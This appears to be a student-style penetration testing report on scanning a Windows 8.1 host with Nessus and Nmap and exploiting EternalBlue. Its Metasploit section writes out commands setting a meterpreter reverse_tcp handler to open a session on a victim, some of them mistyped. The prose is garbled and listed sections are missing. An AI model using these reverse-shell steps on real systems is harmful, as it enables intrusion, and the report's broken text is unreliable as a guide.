Penetration Testing Report
Penetration Testing Report
Document details :
Completed on August 26 2023
2: Network Scanning
2.1 : Nessus Scanning
2.2 : Nmap Scanning
2.3 : Critical Findings
2.4 : High Findings
2.5 : Medium Findings
2.6 : Low Findings
4: Exploitations
4.1 net cat
4.2 : Metasploit
5: Conclusion
5.1 : Summary of Findings
5.2 : Summary of Exploits
1.Executive Summary
In this report we tested the network
to find how to secure our network . we will talk
about
what we did , what we found , and what we do to
safe
the network . but over report is not only for saftey
in
there we also know how to exploit that systems .
1.2 : Overview
This report like is when we check a house
to make sure it safe from robbers . but there we also act
like robbers . first we find week points the system using
multiples tools through the scan and know about that
loop wholes . and how to exploit that Vulnerablities .
1.3 : Recommendations
in there we studied the problems
and find the best way to solve that’s problems . this
suggestions act like protector to protect your computers
from hackers .
2. Network Scanning
Network Scanning is like a
robber find windows and doors which is open and
robber get in the house easily . in computer world for
this process using special tools to find all the places
where network can be vulnrable . its like checking
unlock doors that hackers use to get in the computer .
2.1 : Nessus
Nessus is a very powerfull tools for
scanning network . in there we find that vulenrabilites
which attacker can use for exploit our system so in this
report for scanning we will use nessus tools.
Download link :
https://www.tenable.com/downloads/nessus?
loginAttempted=true
Scan Window 8.1 with Nessus
Solution
if you want to solve this problem so turn of smbv1
and use smbv2 and smbv3 its much more safe than
smbv1 .
Second one is keep update your system . because its
fixing holes .
4.Exploitation
So there we exploit windows 8.1 using Netcat and
MS17 -010 exploit code which is avaliable on github in
there we didn’t use Metasploit .we can exploit Eternal
blue Manaullay using code .
4.1 Net cat
Netcat is like a tool that computers talk to each
other over the network . it can help to send and recive
information between computers in different ways . it
very usefull for checking connections and transfering
files .
Solution
Keep update your windows opreating system
So you can see there are many ports are open but
Mostly attackers use 445/tcp port which we already
disscus in previous topics what is 445/tcp port and
why hacker use this port
So this is the result of nmap scanning
4.2 Metasploit
In simple words metasploit is like toolbox for
cyber security experts . they use this tools for find
vulnerabilities in computers and networks . hackers use
for exploit systems and other things . this tool use alos
ethical hackers for find vulnerabilities and to fix them.
To run in kali linux first open your kali linux terminal and
write this command $ msfconsole
After run the metasploit you can use for your problems
and situation
$ use multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ setlhost = (local host)
$ setlport = (localport)
Now in this phase we create a session with victm system
for creating session we type exploit or run command